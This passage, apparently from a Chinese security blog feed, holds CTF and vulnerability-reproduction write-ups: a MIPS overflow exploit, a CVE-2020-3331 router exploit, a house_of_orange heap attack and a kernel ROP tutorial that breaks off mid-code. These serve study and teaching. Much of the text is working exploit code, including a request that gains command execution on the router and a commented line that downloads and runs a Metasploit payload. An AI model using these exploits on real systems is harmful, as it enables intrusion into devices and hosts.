io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br>ru(<span class="hljs-string">"Enter the group number:"</span>)<br>sl(<span class="hljs-built_in">str</span>(<span class="hljs-number">1</span>))<br><br>jr_a2=<span class="hljs-number">0x0421684</span><br>addiu_a2=<span class="hljs-number">0x4273c4</span> <span class="hljs-comment">#addiu $a2,$sp,0x70+var_C jalr $s0</span><br><br>ru(<span class="hljs-string">"'1:Job.'"</span>)<br>payload=<span class="hljs-string">b'1:'</span><br>payload += <span class="hljs-string">b'a'</span>*<span class="hljs-number">0x6c</span> + p32(jr_a2) + <span class="hljs-string">b'a'</span>*<span class="hljs-number">0x20</span> + p32(addiu_a2)<br>payload += <span class="hljs-string">b'a'</span>*<span class="hljs-number">0x64</span> + asm(shellcraft.sh())<br><br>sl(payload)<br><br>ia()<br></code></pre></td></tr></table></figure><h3 id="CVE-2020-3331复现"><a href="#CVE-2020-3331复现" class="headerlink" title="CVE-2020-3331复现"></a>CVE-2020-3331复现</h3><p>参考:<a href="https://github.com/ReAbout/pwn-exercise-iot/blob/main/linux_mips_stack/mips_iot_cc/pwn.md">https://github.com/ReAbout/pwn-exercise-iot/blob/main/linux_mips_stack/mips_iot_cc/pwn.md</a></p><p>上面链接有固件下载链接还有复现环境,但是不推荐使用他里面的复现环境(docker),因为版本太老的原因,会出现很多问题,不如直接自己使用qemu模拟环境</p><p>漏洞出现的位置:guest_logout_cgi函数当中对于sscanf对于submit_button参数的处理</p><p><strong>sscanf</strong> 与我们熟悉的 <strong>scanf</strong> 非常类似,二者的区别在于:在调用 <strong>sscanf</strong> 时,需要将带解析的字符串作为第一个参数传入;而在调用 <strong>scanf</strong> 时,待解析的参数则是来自标准输入。为了更好地理解 <strong>sscanf</strong> 的功能,不妨先来看一个例子:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> {<br> <span class="hljs-type">int</span> a, b, c;<br> <span class="hljs-type">char</span> <span class="hljs-built_in">string</span>[<span class="hljs-number">15</span>] = <span class="hljs-string">"1 2 3"</span>;<br> <span class="hljs-built_in">sscanf</span>(<span class="hljs-built_in">string</span>, <span class="hljs-string">"%d %d %d"</span>, &a, &b, &c);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%d %d %d\n"</span>, a, b, c);<br> system(<span class="hljs-string">"pause"</span>);<br>}<br></code></pre></td></tr></table></figure><p>在本例中, <strong>sscanf</strong> 利用格式化字符串 <strong>“%d %d %d”</strong> 将 <strong>string</strong> 中的1、2、3分别赋值给了变量 <strong>a</strong> 、 <strong>b</strong> 和 <strong>c</strong> 。</p><p><strong>sscanf</strong> 利用格式化字符串 <strong>“%[^;];%*[^=]=%[^\n]”</strong> 将 <strong>v11</strong> 分成了6个部分,其中 <strong>sub_string1</strong> 是一个不含 <strong>‘;’</strong> 的字符串(对应 <strong>%[^;]</strong> ),其值将被赋给 <strong>v29</strong>; <strong>sub_string2</strong> 是一个不含 <strong>‘=’</strong> 的字符串(对应 <strong>%*[^=]</strong> ,此处 ***** 起到舍弃该值的作用),其值将被丢弃; <strong>sub_string3</strong> 是一个不含 <strong>‘\n’</strong> 的字符串(对应 <strong>%[^\n]</strong> ),其值将被赋给 <strong>v28</strong>。例如,若 <strong>v11 = “AAAA;var=BBBB\n”</strong> ,则 <strong>v29 = “AAAA”</strong> 、 <strong>v28 = “BBBB”</strong> 。</p><p>而触发漏洞需要满足下面三个条件:</p><ol><li><strong>v5</strong> != NULL && <strong>v10</strong> != NULL</li><li><strong>v5</strong> 是一个合法的MAC地址 && <strong>v10</strong> 是一个合法的IPv4地址</li><li><strong>v11</strong> 中需要包含子串 <strong>“status_guestnet.asp”</strong> 。</li></ol><p>v5=get_cgi(“cmac”);</p><p>v10 = get_cgi(“cip”);</p><p>v11 = get_cgi(“submit_button”);</p><p>然后就可以想办法构造payload了,这个固件比较凑巧在函数最后返回的时候,a0刚好是前面sscanf的第一个参数,也就是在程序最后溢出控制返回地址为system时的第一个参数刚好就是我们前面的输入值</p><p>exp:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-comment">#!/usr/bin/python3</span><br><br><span class="hljs-keyword">from</span> pwn import *<br>import requests<br><span class="hljs-keyword">from</span> threading import Thread<br><br>context(<span class="hljs-attribute">arch</span>=<span class="hljs-string">'mips'</span>, <span class="hljs-attribute">endian</span>=<span class="hljs-string">'little'</span>, <span class="hljs-attribute">os</span>=<span class="hljs-string">'linux'</span>)<br><span class="hljs-built_in"></span><br><span class="hljs-built_in">system </span>= 0x0047A610<br><br>cmd = <span class="hljs-string">'\n'</span><br><span class="hljs-comment">#cmd += 'wget http://192.168.2.1:8000/tools/msf -O /msf\n'</span><br><span class="hljs-comment">#cmd += 'chmod 777 /msf\n'</span><br><span class="hljs-comment">#cmd += '/msf\n'</span><br>cmd += <span class="hljs-string">'echo "pwn_sucess" > /tmp/test.txt\n'</span><br><br>assert(len(cmd) < 0x55)<br><br>payload = b<span class="hljs-string">"status_guestnet.asp"</span> + cmd.ljust(0x55,<span class="hljs-string">'b'</span>).encode() + p32(system) <br><span class="hljs-comment">#payload=b"status_guestnet.asp" + b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'</span><br>data = {<span class="hljs-string">"cmac"</span>:<span class="hljs-string">"12:af:aa:bb:cc:dd"</span>, <span class="hljs-string">"submit_button"</span>:payload, <span class="hljs-string">"cip"</span>:<span class="hljs-string">"192.168.100.1"</span>}<br><br>def attack():<br> try:<br> requests.post(<span class="hljs-string">"http://192.168.182.21/guest_logout.cgi"</span>, <span class="hljs-attribute">data</span>=data, <span class="hljs-attribute">timeout</span>=1)<br> except Exception as e:<br> <span class="hljs-built_in">print</span>(e)<br><br>thread = Thread(<span class="hljs-attribute">target</span>=attack)<br>thread.start()<br><br>io = listen(31337)<br>io.wait_for_connection()<br>log.success(<span class="hljs-string">"getshell"</span>)<br>io.interactive()<br><br>thread.join()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>house_of_orange</title>
<link href="/2024/03/15/house-of-orange/"/>
<url>/2024/03/15/house-of-orange/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>关于orange前面topchunk构造出unsortedbin的利用手法早就已经学了,但是后面io的攻击始终没有接触,刚好最近在出题,于是学了一下</p><p>参考链接:</p><p><a href="https://blog.wjhwjhn.com/posts/house-of-orange-%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/">https://blog.wjhwjhn.com/posts/house-of-orange-%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/</a></p><p><a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/house-of-orange/">https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/house-of-orange/</a></p><p><a href="https://www.cnblogs.com/xshhc/p/17327672.html">https://www.cnblogs.com/xshhc/p/17327672.html</a></p><h1 id="题目特点"><a href="#题目特点" class="headerlink" title="题目特点"></a>题目特点</h1><p>1.一般libc版本是2.23</p><p>2.题目中并没有free函数</p><p>3.保护全开</p><p>4.堆溢出</p><h1 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h1><p>1.利用topchunk,构造出unsortedbin(即修改topchunk的size然后申请一个比topchunk.size更大的堆块)</p><p>2.泄露出libc和heap的地址</p><p>3.利用unsortedbin attack修改_IO_list_all的地址为main_arena+88</p><p>4.申请出smallbin同时在堆上伪造io(注意这3.4需要在一个步骤进行)</p><h1 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h1><p><strong>第一部分,利用topchunk来free</strong> 先来讲解第一部分,也就是利用topchunk来free从而得到堆地址和libc基址。 这个方法利用的就是当topchunk的size不足够申请的时候,malloc函数会重新申请一块区域作为topchunk,并且把当前的topchunk free掉到unsorted bin,所以我们就可以尝试修改topchunk的size,修改到不足够的大小,然后再申请一次比修改的topchunk的size要大的size</p><p>但是free的topchunk的size有一些要求(很多地方对这个介绍的很复杂,所以我想简单的来说)</p><ol><li>不要太小,比如小于0x10(MINSIZE)就不行了</li><li>topchunk的结束地址(当前地址 + size)要与页基址对齐,一般就是0x1000(结尾三个0)</li><li>prev_inuse = 1</li></ol><p>所以,当我们再次申请大于topchunk size的时候,就会进入unsorted bin,我们就可以leak libc了,并且可以同时泄露出堆地址</p><p><strong>第二步是利用<code>_IO_flush_all_lockp</code>进行攻击</strong> 这个函数我在ByteCTF 2019 note_five的那道题中也用到过,到了这里终于可以好好解释一下了。</p><p>什么时候会触发这个函数? 当系统发生abort的时候,会利用<code>_IO_flush_all_lockp</code>来看看各个fp指针中还有没有数据没有输出的,如果有,那么就会调用<code>_IO_OVERFLOW</code>。 <code>_IO_OVERFLOW</code>这个函数是调用当前fp指针的vtable中的+0x18地址。</p><p>这个函数做了什么? 通过<code>_IO_all_list</code>获取到头指针,然后用<code>fp->_chain</code>来寻找下一个指针,直到0的时候停止。 所以,如果我们可以控制<code>_IO_list_all</code>,并且达成他要求的一些条件,那么我们就可以通过伪造vtable的<code>_IO_OVERFLOW</code>位置(+0x18)的方式来getshell。 不过在libc2.24以上就已经加入了对vtable范围的检测,所以在这里我们的测试环境都是在libc2.23下(ubuntu 16.04)。</p><p>具体如何构造和利用? 由于我们现在没有权限直接对<code>_IO_all_list</code>进行写入地址(废话,如果可以直接写入,那么就直接打<code>__malloc_hook</code>不香吗) 但是我们可以用unsorted bin attack在<code>_IO_all_list</code>上写一个<code>main_arena + 88</code>的地址,然后在<code>_IO_flush_all_lockp</code>函数中就会认为这个地址是一个fp指针,并且判定这个指针的条件是否成立,如果成立的话执行<code>_IO_OVERFLOW</code>,当然由于<code>main_arena</code>的内容很难控制,所以我们无法直接修改这上面的内容进行getshell。</p><p>所以我们要考虑条件不成立的情况,也就是程序没有再次发生异常(因为上诉中vtable的值不受控,如果vtable的值不正确,就可能会发生异常),程序就会到<code>fp->_chain</code>继续查找下一个指针。调试可以发现<code>fp->_chain</code>正好就是smallbin[4]的位置,对应的存放的smallbin size为0x60,所以我们如果可以修改这个位置为一个可控的地址,那么就可以成功伪造一个下一个fp指针达到getshell的目的。</p><p>怎么样才能写入堆地址到smallbin[4]呢? 当你malloc的时候,程序会去看unsorted bin有没有符合的size,这个时候会把unsorted bin拿出来检测,如果大小不合适的话,这时候会先放到small bin中去。 所以如果我们构造一个size为0x60的unsorted bin,然后再free它,那么就可以成功的让他进入smallbin,在那里写入的地址就是这个堆的地址,而这个堆内容被我们提前布置好,就可以成功getshell了。</p><p>堆上需要布置哪些东西呢? 我们需要布置的内容有:</p><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs xl"> <span class="hljs-function"><span class="hljs-title">if</span> (((fp-></span>_<span class="hljs-function"><span class="hljs-title">mode</span> <= 0 && fp-></span>_IO_<span class="hljs-function"><span class="hljs-title">write_ptr</span> > fp-></span>_IO_write_base)<br>#<span class="hljs-keyword">if</span> defined _LIBC || defined _GLIBCPP_USE_WCHAR_T<br> || (_IO_vtable_offset (fp) == <span class="hljs-number">0</span><br> && <span class="hljs-function"><span class="hljs-title">fp</span>-></span>_<span class="hljs-function"><span class="hljs-title">mode</span> > 0 && (fp-></span>_<span class="hljs-function"><span class="hljs-title">wide_data</span>-></span>_IO_write_ptr<br> > <span class="hljs-function"><span class="hljs-title">fp</span>-></span>_<span class="hljs-function"><span class="hljs-title">wide_data</span>-></span>_IO_write_base))<br>#endif<br> )<br> && _IO_OVERFLOW (fp, EOF) == EOF)<br>result = EOF;<br></code></pre></td></tr></table></figure><p>我们知道if是从左到右依次执行的,如果前面的不符合后面的也不会执行,所以我们可以构造下面两者中任意一个。 1.<code>(fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)</code> 2.<code>(_IO_vtable_offset (fp) == 0 && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)</code></p><p>把vtable的值写入一个可控的位置,并且修改<code>vtable+0x18</code>的位置为想要执行的函数</p><p>最后来说说这个流程: 构造后当程序调用到这个位置的fp(前提是前一块没有报错,概率是1/2,因为在main_arena上的<code>fp->_mode</code>的值是不可控的)。 并且判定条件成立,就会去vtable表中执行<code>_IO_OVERFLOW</code>,执行了我们修改的函数。 顺带一提的是,当执行<code>_IO_OVERFLOW</code>的时候,传入的第一个参数就是,这个fp的地址,所以说,如果我们可以修改这个伪造fp的头部位置为/bin/sh,并且伪造vtable中IO_overflow位置为system,那么就可以成功getshell了。 所以我们可以修改我们的可控位置,也就是fp的地址为想要执行的内容,但是一般来说直接修改头部位置,也就是<code>_flags</code>的位置是不太好的,不过由于这里根本没有用到_flags,所以我们可以直接修改。 如果不可以修改<code>_flags</code>的情况,那么就在他后面写一个;sh;,这样的话由于;的隔开,前面后面的语句都会认为是错误的,所以也成功执行了sh。</p><p>我们有一个方法可以同时完成以上步骤,就是一次性写好所有的构造数据在堆上,这时候malloc一次和原来的数据大小不一样的size。 这时候的执行步骤的这样的。 1.执行unsorted bin attack,修改<code>BK->fd = main_arena + 88</code> 2.malloc chunk发现unsorted bin中的size和要申请的size大小不匹配,所以把unsorted bin中的数据放到了smallbin中,具体是哪块位置呢?这时候就要看size了,这里构造的size是0x60,所以就会进入到smallbin[4]中,这里对应的内容就是<code>fp->_chain</code>。 3.由于链表被破坏了,所以在之后的检测发生了报错,这个报错就会调用到<code>_IO_flush_all_lockp</code>,而这里就会对<code>_IO_list_all</code>进行遍历,由于1中修改了<code>_IO_list_all</code>为<code>main_arena + 88</code>,这时候就会去看对应数据符不符合要求。 如果这里符合要求,那么就会调用这里vtable的<code>IO_overflow</code>,由于这里的数据我们没有构造过,所以就会发生又一次异常,getshell失败了(1/2)。 如果这里不符合要求,就会去看这里的<code>fp->_chain</code>的位置,正好是我们伪造的smallbin[4]的地方,这时候fp指针指向我们伪造的堆块,堆块的对应内容符合要求,就会去我们伪造的可控的vtable执行<code>_IO_OVERFLOW</code>,而这里被我们伪造成system,并且我们修改这个fp的头部位置为<code>/bin/sh</code>,所以当调用的时候就会把这个作为参数去调用,最后就是执行了<code>system("/bin/sh")</code>,也就成功getshell了。</p><h1 id="例题:"><a href="#例题:" class="headerlink" title="例题:"></a>例题:</h1><p>题目是自己出的,等什么时候那边使用了再放出来吧</p><p>exp:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">add</span>(0,0x30)<br><span class="hljs-built_in">edit</span>(0,0x40,b<span class="hljs-string">'A'</span><span class="hljs-number">*0</span>x30+p64(0)+p64(0xfc1))<br><br><span class="hljs-built_in">add</span>(1,0x1000)<br><span class="hljs-built_in">add</span>(2,0x400)<br>show(2)<br><span class="hljs-attribute">libcbase</span>=uu64()-0x3c5188<br>lg(<span class="hljs-string">"libcbase"</span>)<br><span class="hljs-attribute">io_list_all</span>=libcbase+libc.sym[<span class="hljs-string">'_IO_list_all'</span>]<br><span class="hljs-attribute">system</span>=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br><span class="hljs-attribute">fd</span>=libcbase+0x3c4b78<br><br><span class="hljs-built_in">edit</span>(2,0x10,b<span class="hljs-string">'A'</span><span class="hljs-number">*0</span>xf+b<span class="hljs-string">'B'</span>)<br>show(2)<br>ru(b<span class="hljs-string">'B'</span>)<br><span class="hljs-attribute">heapbase</span>=u64(io.recvuntil(b'\n',drop=True).ljust(8,b'\x00'))-0x40<br>lg(<span class="hljs-string">"heapbase"</span>)<br><br><span class="hljs-attribute">vtable</span>=heapbase+0x450<br>payload = b<span class="hljs-string">'a'</span> * 0x400<br>fake_file = b<span class="hljs-string">'/bin/sh\x00'</span> + p64(0x61)<br>fake_file += p64(system) + p64(io_list_all - 0x10)<br>fake_file += p64(0) + p64(1)<br>fake_file = fake_file.ljust(0xc0,b<span class="hljs-string">'\x00'</span>)<br>fake_file += p64(0) * 3<br>fake_file += p64(vtable+0xf0-0x18)<br>fake_file += p64(0) * 2<br>fake_file += p64(system)<br>payload += fake_file<br><span class="hljs-built_in">edit</span>(2,len(payload),payload)<br><span class="hljs-built_in">add</span>(3,0x10)<br><br>ia()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>kernel_rop</title>
<link href="/2024/03/04/kernel-rop/"/>
<url>/2024/03/04/kernel-rop/</url>
<content type="html"><![CDATA[<p>参考文章:<a href="https://ctf-wiki.org/pwn/linux/kernel-mode/exploitation/rop/rop/#_4">https://ctf-wiki.org/pwn/linux/kernel-mode/exploitation/rop/rop/#_4</a></p><p><strong>内核态的 ROP 与用户态的 ROP 一般无二,只不过利用的 gadget 变成了内核中的 gadget,所需要构造执行的 ropchain 由</strong> <code>system("/bin/sh")</code> <strong>变为了</strong> <code>commit_creds(&init_cred)</code> 或 <code>commit_creds(prepare_kernel_cred(NULL))</code>,当我们成功地在内核中执行这样的代码后,当前线程的 cred 结构体便变为 init 进程的 cred 的拷贝,我们也就获得了 root 权限,此时在用户态起一个 shell 便能获得 root shell。</p><h2 id="状态保存"><a href="#状态保存" class="headerlink" title="状态保存"></a>状态保存</h2><p>通常情况下,我们的 exploit 需要进入到内核当中完成提权,而我们最终仍然需要<strong>着陆回用户态</strong>以获得一个 root 权限的 shell,因此在我们的 exploit 进入内核态之前我们需要<strong>手动模拟用户态进入内核态的准备工作</strong>——<strong>保存各寄存器的值到内核栈上</strong>,以便于后续着陆回用户态。</p><p>通常情况下使用如下函数保存各寄存器值到我们自己定义的变量中,以便于构造 rop 链</p><p>一个通用的pwn板子</p><p>编译时需要指定参数:<code>-masm=intel</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-type">size_t</span> user_cs, user_ss, user_rflags, user_sp;<br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">saveStatus</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>{<br> __asm__(<span class="hljs-string">"mov user_cs, cs;"</span><br> <span class="hljs-string">"mov user_ss, ss;"</span><br> <span class="hljs-string">"mov user_sp, rsp;"</span><br> <span class="hljs-string">"pushf;"</span><br> <span class="hljs-string">"pop user_rflags;"</span><br> );<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"\033[34m\033[1m[*] Status has been saved.\033[0m"</span>);<br>}<br></code></pre></td></tr></table></figure><h2 id="返回用户态"><a href="#返回用户态" class="headerlink" title="返回用户态"></a>返回用户态</h2><p>由内核态返回用户态只需要:</p><ul><li><code>swapgs</code>指令恢复用户态 GS 寄存器</li><li><code>sysretq</code>或者<code>iretq</code>恢复到用户空间</li></ul><p>那么我们只需要在内核中找到相应的 gadget 并执行<code>swapgs;iretq</code>就可以成功着陆回用户态。</p><p>通常来说,我们应当构造如下 rop 链以返回用户态并获得一个 shell:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs awk">swapgs<br>iretq<br>user_shell_addr<br>user_cs<br>user_eflags <span class="hljs-regexp">//</span><span class="hljs-number">64</span>bit user_rflags<br>user_sp<br>user_ss<br></code></pre></td></tr></table></figure><h2 id="例题:强网杯-2018-core"><a href="#例题:强网杯-2018-core" class="headerlink" title="例题:强网杯 2018 - core"></a>例题:强网杯 2018 - core</h2><h3 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h3><p>题目给了 bzImage,core.cpio,start.sh 以及带符号表的 vmlinux 四个文件</p><p>前三个文件我们已经知道了作用,vmlinux 则是静态编译,未经过压缩的 kernel 文件,相对应的 bzImage 可以理解为压缩后的文件,更详细的可以看 <a href="https://unix.stackexchange.com/questions/5518/what-is-the-difference-between-the-following-kernel-makefile-terms-vmlinux-vml">stackexchange</a></p><p>vmlinux 未经过压缩,也就是说我们可以从 vmlinux 中找到一些 gadget,我们先把 gadget 保存下来备用。 </p><p>这里建议使用ropper来查找可能会比较方便,或者使用ROPgadget将所有gadget导入一个文本文档</p><p> 看一下 start.sh </p><figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs livescript">qemu-system-x86_64 <span class="hljs-string">\</span><br>-m <span class="hljs-number">64</span>M <span class="hljs-string">\</span><br>-kernel ./bzImage <span class="hljs-string">\</span><br>-initrd ./core.cpio <span class="hljs-string">\</span><br>-append <span class="hljs-string">"root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr"</span> <span class="hljs-string">\</span><br>-s <span class="hljs-string">\</span><br>-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 <span class="hljs-string">\</span><br>-nographic <span class="hljs-string">\</span><br></code></pre></td></tr></table></figure><p>发现内核开启了 kaslr 保护。</p><p>解压 core.cpio 后,看一下 init (这里我的脚本已经修改过了)</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-meta">#!/bin/sh</span><br>mount -t proc proc /proc<br>mount -t sysfs sysfs /sys<br>mount -t devtmpfs none /dev<br>/sbin/mdev -s<br><span class="hljs-built_in">mkdir</span> -p /dev/pts<br>mount -vt devpts -o gid=4,mode=620 none /dev/pts<br><span class="hljs-built_in">chmod</span> 666 /dev/ptmx<br><span class="hljs-built_in">cat</span> /proc/kallsyms > /tmp/kallsyms<br><span class="hljs-built_in">echo</span> 1 > /proc/sys/kernel/kptr_restrict<br><span class="hljs-built_in">echo</span> 1 > /proc/sys/kernel/dmesg_restrict<br>ifconfig eth0 up<br>udhcpc -i eth0<br>ifconfig eth0 10.0.2.15 netmask 255.255.255.0<br>route add default gw 10.0.2.2 <br>insmod /core.ko<br><br><span class="hljs-comment">#poweroff -d 120 -f &</span><br><span class="hljs-comment">#setsid /bin/cttyhack setuidgid 1000 /bin/sh</span><br>setsid /bin/cttyhack setuidgid 0 /bin/sh<br><span class="hljs-built_in">echo</span> <span class="hljs-string">'sh end!\n'</span><br>umount /proc<br>umount /sys<br></code></pre></td></tr></table></figure><ul><li>第 9 行中把 kallsyms 的内容保存到了 /tmp/kallsyms 中,那么我们就能从 /tmp/kallsyms 中读取 commit_creds,prepare_kernel_cred 的函数的地址了</li><li>第 10 行把 kptr_restrict 设为 1,这样就不能通过 /proc/kallsyms 查看函数地址了,但第 9 行已经把其中的信息保存到了一个可读的文件中,这句就无关紧要了</li><li>第 11 行把 dmesg_restrict 设为 1,这样就不能通过 dmesg 查看 kernel 的信息了</li><li>第 18 行设置了定时关机,为了避免做题时产生干扰,直接把这句删掉然后重新打包</li></ul><p>同时还发现了一个 shell 脚本 gen_cpio.sh,主要是方便打包的脚本</p><p>这里运行kernel需要将start.sh内的64改为128,需要将分配给内核的内存调大,因为这里我很多都已经改过了就直接放wiki的操作了</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs stylus">core <span class="hljs-selector-attr">[master●●]</span> vim init <br>core <span class="hljs-selector-attr">[master●●]</span> rm core<span class="hljs-selector-class">.cpio</span> <br>core <span class="hljs-selector-attr">[master●●]</span> ./gen_cpio<span class="hljs-selector-class">.sh</span> core<span class="hljs-selector-class">.cpio</span><br>.<br>./usr<br>./usr/sbin<br>./usr/sbin/popmaildir<br>......<br>......<br>./core<span class="hljs-selector-class">.cpio</span><br>./core<span class="hljs-selector-class">.ko</span><br><span class="hljs-number">129851</span> 块<br>core <span class="hljs-selector-attr">[master●●]</span> ls<br>bin core<span class="hljs-selector-class">.ko</span> gen_cpio<span class="hljs-selector-class">.sh</span> lib linuxrc root sys usr<br>core<span class="hljs-selector-class">.cpio</span> etc init lib64 proc sbin tmp vmlinux<br>core <span class="hljs-selector-attr">[master●●]</span> mv core<span class="hljs-selector-class">.cpio</span> ..<br>core <span class="hljs-selector-attr">[master●●]</span> cd ..<br>give_to_player <span class="hljs-selector-attr">[master●●]</span> ./start<span class="hljs-selector-class">.sh</span> <br></code></pre></td></tr></table></figure><p>接着分析core.ko</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403042204484.png" alt="image-20240304220457326"></p><p>用ida查看,发现在core_copy_func中存在明显的栈溢出</p><figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span 